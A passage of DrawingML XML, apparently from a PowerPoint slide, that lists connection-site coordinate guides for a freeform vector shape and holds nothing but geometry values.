              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 512991 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3217217 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY113" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX114" fmla="*/ 62772 w 1349253"/>
              <a:gd name="connsiteY114" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX115" fmla="*/ 64228 w 1349253"/>
              <a:gd name="connsiteY115" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX116" fmla="*/ 75144 w 1349253"/>
              <a:gd name="connsiteY116" fmla="*/ 921368 h 6858000"/>
              <a:gd name="connsiteX117" fmla="*/ 59093 w 1349253"/>
              <a:gd name="connsiteY117" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX118" fmla="*/ 28501 w 1349253"/>
              <a:gd name="connsiteY118" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX119" fmla="*/ 7451 w 1349253"/>
              <a:gd name="connsiteY119" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX120" fmla="*/ 7009 w 1349253"/>
              <a:gd name="connsiteY120" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX121" fmla="*/ 16141 w 1349253"/>
              <a:gd name="connsiteY121" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX122" fmla="*/ 19 w 1349253"/>
              <a:gd name="connsiteY122" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX123" fmla="*/ 7093 w 1349253"/>
              <a:gd name="connsiteY123" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX124" fmla="*/ 11001 w 1349253"/>
              <a:gd name="connsiteY124" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX125" fmla="*/ 37125 w 1349253"/>
              <a:gd name="connsiteY125" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX126" fmla="*/ 36373 w 1349253"/>
              <a:gd name="connsiteY126" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX127" fmla="*/ 36203 w 1349253"/>
              <a:gd name="connsiteY127" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX128" fmla="*/ 41896 w 1349253"/>
              <a:gd name="connsiteY128" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX129" fmla="*/ 58923 w 1349253"/>
              <a:gd name="connsiteY129" fmla="*/ 212860 h 6858000"/>
              <a:gd name="connsiteX130" fmla="*/ 50633 w 1349253"/>
              <a:gd name="connsiteY130" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX131" fmla="*/ 62917 w 1349253"/>
              <a:gd name="connsiteY131" fmla="*/ 55288 h 6858000"/>
              <a:gd name="connsiteX132" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY132" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 22471 w 1349253"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1349253 w 1349253"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 85947 w 1349253"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 122540 w 1349253"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 134040 w 1349253"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 158779 w 1349253"/>
              <a:gd name="connsiteY6" fmla="*/ 6691589 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 150803 w 1349253"/>
              <a:gd name="connsiteY7" fmla="*/ 6659970 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 151427 w 1349253"/>
              <a:gd name="connsiteY8" fmla="*/ 6636211 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 168871 w 1349253"/>
              <a:gd name="connsiteY9" fmla="*/ 6594177 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 182911 w 1349253"/>
              <a:gd name="connsiteY10" fmla="*/ 6557575 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 235868 w 1349253"/>
              <a:gd name="connsiteY11" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251555 w 1349253"/>
              <a:gd name="connsiteY12" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 295260 w 1349253"/>
              <a:gd name="connsiteY13" fmla="*/ 6379786 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 278483 w 1349253"/>
              <a:gd name="connsiteY14" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255898 w 1349253"/>
              <a:gd name="connsiteY15" fmla="*/ 6313295 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 263062 w 1349253"/>
              <a:gd name="connsiteY16" fmla="*/ 6280046 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 266061 w 1349253"/>
              <a:gd name="connsiteY17" fmla="*/ 6272987 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 272835 w 1349253"/>
              <a:gd name="connsiteY18" fmla="*/ 6252834 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 250827 w 1349253"/>
              <a:gd name="connsiteY19" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 249625 w 1349253"/>
              <a:gd name="connsiteY20" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 265040 w 1349253"/>
              <a:gd name="connsiteY21" fmla="*/ 6078132 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 252427 w 1349253"/>
              <a:gd name="connsiteY22" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 237656 w 1349253"/>
              <a:gd name="connsiteY23" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 287168 w 1349253"/>
              <a:gd name="connsiteY24" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 316966 w 1349253"/>
              <a:gd name="connsiteY25" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 326089 w 1349253"/>
              <a:gd name="connsiteY26" fmla="*/ 5563435 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 352965 w 1349253"/>
              <a:gd name="connsiteY27" fmla="*/ 5437125 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 366533 w 1349253"/>
              <a:gd name="connsiteY28" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 382514 w 1349253"/>
              <a:gd name="connsiteY29" fmla="*/ 5330009 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 416007 w 1349253"/>
              <a:gd name="connsiteY30" fmla="*/ 5273739 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 425606 w 1349253"/>
              <a:gd name="connsiteY31" fmla="*/ 5241779 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 436832 w 1349253"/>
              <a:gd name="connsiteY32" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 437852 w 1349253"/>
              <a:gd name="connsiteY33" fmla="*/ 5217684 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 445193 w 1349253"/>
              <a:gd name="connsiteY34" fmla="*/ 5193377 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 448496 w 1349253"/>
              <a:gd name="connsiteY35" fmla="*/ 5179288 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 449480 w 1349253"/>
              <a:gd name="connsiteY36" fmla="*/ 5173621 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 445114 w 1349253"/>
              <a:gd name="connsiteY37" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 451791 w 1349253"/>
              <a:gd name="connsiteY38" fmla="*/ 5144295 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 448724 w 1349253"/>
              <a:gd name="connsiteY39" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 455554 w 1349253"/>
              <a:gd name="connsiteY40" fmla="*/ 5121884 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 462590 w 1349253"/>
              <a:gd name="connsiteY41" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 465321 w 1349253"/>
              <a:gd name="connsiteY42" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 462025 w 1349253"/>
              <a:gd name="connsiteY43" fmla="*/ 5034192 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 463579 w 1349253"/>
              <a:gd name="connsiteY44" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 470488 w 1349253"/>
              <a:gd name="connsiteY45" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 466344 w 1349253"/>
              <a:gd name="connsiteY46" fmla="*/ 4932692 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 481747 w 1349253"/>
              <a:gd name="connsiteY47" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 487650 w 1349253"/>
              <a:gd name="connsiteY48" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 492383 w 1349253"/>
              <a:gd name="connsiteY49" fmla="*/ 4780965 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 493676 w 1349253"/>
              <a:gd name="connsiteY50" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 491483 w 1349253"/>
              <a:gd name="connsiteY51" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 486963 w 1349253"/>
              <a:gd name="connsiteY52" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 482046 w 1349253"/>
              <a:gd name="connsiteY53" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 478611 w 1349253"/>
              <a:gd name="connsiteY54" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 459264 w 1349253"/>
              <a:gd name="connsiteY55" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 463337 w 1349253"/>
              <a:gd name="connsiteY56" fmla="*/ 4090296 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 448593 w 1349253"/>
              <a:gd name="connsiteY57" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 449742 w 1349253"/>
              <a:gd name="connsiteY58" fmla="*/ 4031933 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 448318 w 1349253"/>
              <a:gd name="connsiteY59" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 434613 w 1349253"/>
              <a:gd name="connsiteY60" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 436211 w 1349253"/>
              <a:gd name="connsiteY61" fmla="*/ 3969950 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 429633 w 1349253"/>
              <a:gd name="connsiteY62" fmla="*/ 3933779 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 430964 w 1349253"/>
              <a:gd name="connsiteY63" fmla="*/ 3933093 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 435318 w 1349253"/>
              <a:gd name="connsiteY64" fmla="*/ 3922082 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 440396 w 1349253"/>
              <a:gd name="connsiteY65" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 462990 w 1349253"/>
              <a:gd name="connsiteY66" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 462415 w 1349253"/>
              <a:gd name="connsiteY67" fmla="*/ 3806161 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 462722 w 1349253"/>
              <a:gd name="connsiteY68" fmla="*/ 3805957 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 462749 w 1349253"/>
              <a:gd name="connsiteY69" fmla="*/ 3797724 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 461364 w 1349253"/>
              <a:gd name="connsiteY70" fmla="*/ 3792098 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 460248 w 1349253"/>
              <a:gd name="connsiteY71" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 461981 w 1349253"/>
              <a:gd name="connsiteY72" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 465724 w 1349253"/>
              <a:gd name="connsiteY73" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 465190 w 1349253"/>
              <a:gd name="connsiteY74" fmla="*/ 3767709 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 473886 w 1349253"/>
              <a:gd name="connsiteY75" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 481232 w 1349253"/>
              <a:gd name="connsiteY76" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 480528 w 1349253"/>
              <a:gd name="connsiteY77" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 483971 w 1349253"/>
              <a:gd name="connsiteY78" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 491509 w 1349253"/>
              <a:gd name="connsiteY79" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 493180 w 1349253"/>
              <a:gd name="connsiteY80" fmla="*/ 3307769 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 510743 w 1349253"/>
              <a:gd name="connsiteY81" fmla="*/ 3250522 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 511168 w 1349253"/>
              <a:gd name="connsiteY82" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 487927 w 1349253"/>
              <a:gd name="connsiteY83" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 473112 w 1349253"/>
              <a:gd name="connsiteY84" fmla="*/ 3129034 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 473777 w 1349253"/>
              <a:gd name="connsiteY85" fmla="*/ 3126682 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 451254 w 1349253"/>
              <a:gd name="connsiteY86" fmla="*/ 3106272 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 423984 w 1349253"/>
              <a:gd name="connsiteY87" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 366598 w 1349253"/>
              <a:gd name="connsiteY88" fmla="*/ 2762989 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 315516 w 1349253"/>
              <a:gd name="connsiteY89" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 286333 w 1349253"/>
              <a:gd name="connsiteY90" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 273294 w 1349253"/>
              <a:gd name="connsiteY91" fmla="*/ 2425819 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 279293 w 1349253"/>
              <a:gd name="connsiteY92" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 281905 w 1349253"/>
              <a:gd name="connsiteY93" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 258234 w 1349253"/>
              <a:gd name="connsiteY94" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 248121 w 1349253"/>
              <a:gd name="connsiteY95" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 232338 w 1349253"/>
              <a:gd name="connsiteY96" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 229796 w 1349253"/>
              <a:gd name="connsiteY97" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 230789 w 1349253"/>
              <a:gd name="connsiteY98" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 222595 w 1349253"/>
              <a:gd name="connsiteY99" fmla="*/ 1963269 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 203773 w 1349253"/>
              <a:gd name="connsiteY100" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX101" fmla="*/ 180330 w 1349253"/>
              <a:gd name="connsiteY101" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX102" fmla="*/ 134129 w 1349253"/>
              <a:gd name="connsiteY102" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX103" fmla="*/ 106440 w 1349253"/>
              <a:gd name="connsiteY103" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX104" fmla="*/ 105566 w 1349253"/>
              <a:gd name="connsiteY104" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX105" fmla="*/ 86361 w 1349253"/>
              <a:gd name="connsiteY105" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX106" fmla="*/ 92183 w 1349253"/>
              <a:gd name="connsiteY106" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX107" fmla="*/ 78268 w 1349253"/>
              <a:gd name="connsiteY107" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX108" fmla="*/ 86575 w 1349253"/>
              <a:gd name="connsiteY108" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX109" fmla="*/ 87763 w 1349253"/>
              <a:gd name="connsiteY109" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX110" fmla="*/ 92448 w 1349253"/>
              <a:gd name="connsiteY110" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX111" fmla="*/ 84730 w 1349253"/>
              <a:gd name="connsiteY111" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX112" fmla="*/ 74036 w 1349253"/>
              <a:gd name="connsiteY112" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX113" fmla="*/ 62772 w 1349253"/>
